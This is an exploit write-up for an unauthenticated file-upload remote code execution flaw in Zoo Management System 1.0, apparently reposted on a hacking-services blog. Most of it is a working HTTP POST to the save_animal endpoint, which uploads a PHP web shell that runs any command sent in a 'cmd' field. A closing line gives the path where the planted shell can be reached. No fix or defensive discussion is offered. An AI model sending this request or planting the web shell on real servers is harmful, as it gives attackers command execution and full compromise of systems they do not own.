Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86372840

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE
# Date: 16.10.2023
# Exploit Author: Çağatay Ceyhan
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database
# Version: 1.0
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.


POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1
Host: localhost
Content-Length: 6162
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="animal_id"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_given_name"

kdkd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_species_name"

ıdsıd
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dob"

1552-02-05
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_gender"

m
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_avg_lifespan"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="class_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="location_id"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_dietary_req"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_natural_habitat"

faad
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_pop_dist"

eterter
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_joindate"

5559-02-06
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_height"

2
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_weight"

3
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_description"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="images[]"; filename="ultra.php"
Content-Type: application/octet-stream

<?php
if (!empty($_POST['cmd'])) {
    $cmd = shell_exec($_POST['cmd']);
}
?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Web Shell</title>
    <style>
        * {
            -webkit-box-sizing: border-box;
            box-sizing: border-box;
        }

        body {
            font-family: sans-serif;
            color: rgba(0, 0, 0, .75);
        }

        main {
            margin: auto;
            max-width: 850px;
        }

        pre,
        input,
        button {
            padding: 10px;
            border-radius: 5px;
            background-color: #efefef;
        }

        label {
            display: block;
        }

        input {
            width: 100%;
            background-color: #efefef;
            border: 2px solid transparent;
        }

        input:focus {
            outline: none;
            background: transparent;
            border: 2px solid #e6e6e6;
        }

        button {
            border: none;
            cursor: pointer;
            margin-left: 5px;
        }

        button:hover {
            background-color: #e6e6e6;
        }

        .form-group {
            display: -webkit-box;
            display: -ms-flexbox;
            display: flex;
            padding: 15px 0;
        }
    </style>

</head>

<body>
    <main>
        <h1>Web Shell</h1>
        <h2>Execute a command</h2>

        <form method="post">
            <label for="cmd"><strong>Command</strong></label>
            <div class="form-group">
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>
                <button type="submit">Execute</button>
            </div>
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
            <h2>Output</h2>
            <?php if (isset($cmd)): ?>
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>
            <?php else: ?>
                <pre><small>No result.</small></pre>
            <?php endif; ?>
        <?php endif; ?>
    </main>
</body>
</html>
------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_med_record"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_transfer_reason"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_date"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_death_cause"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="an_incineration"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_gest_period"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_category"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="m_avg_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_nest_const"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_wingspan"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="b_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_body_temp"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_water_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="f_color_variant"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="rep_type"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="clutch_size"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="num_offspring"


------WebKitFormBoundary8NY8zT5dXIloiUML
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary8NY8zT5dXIloiUML--




## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.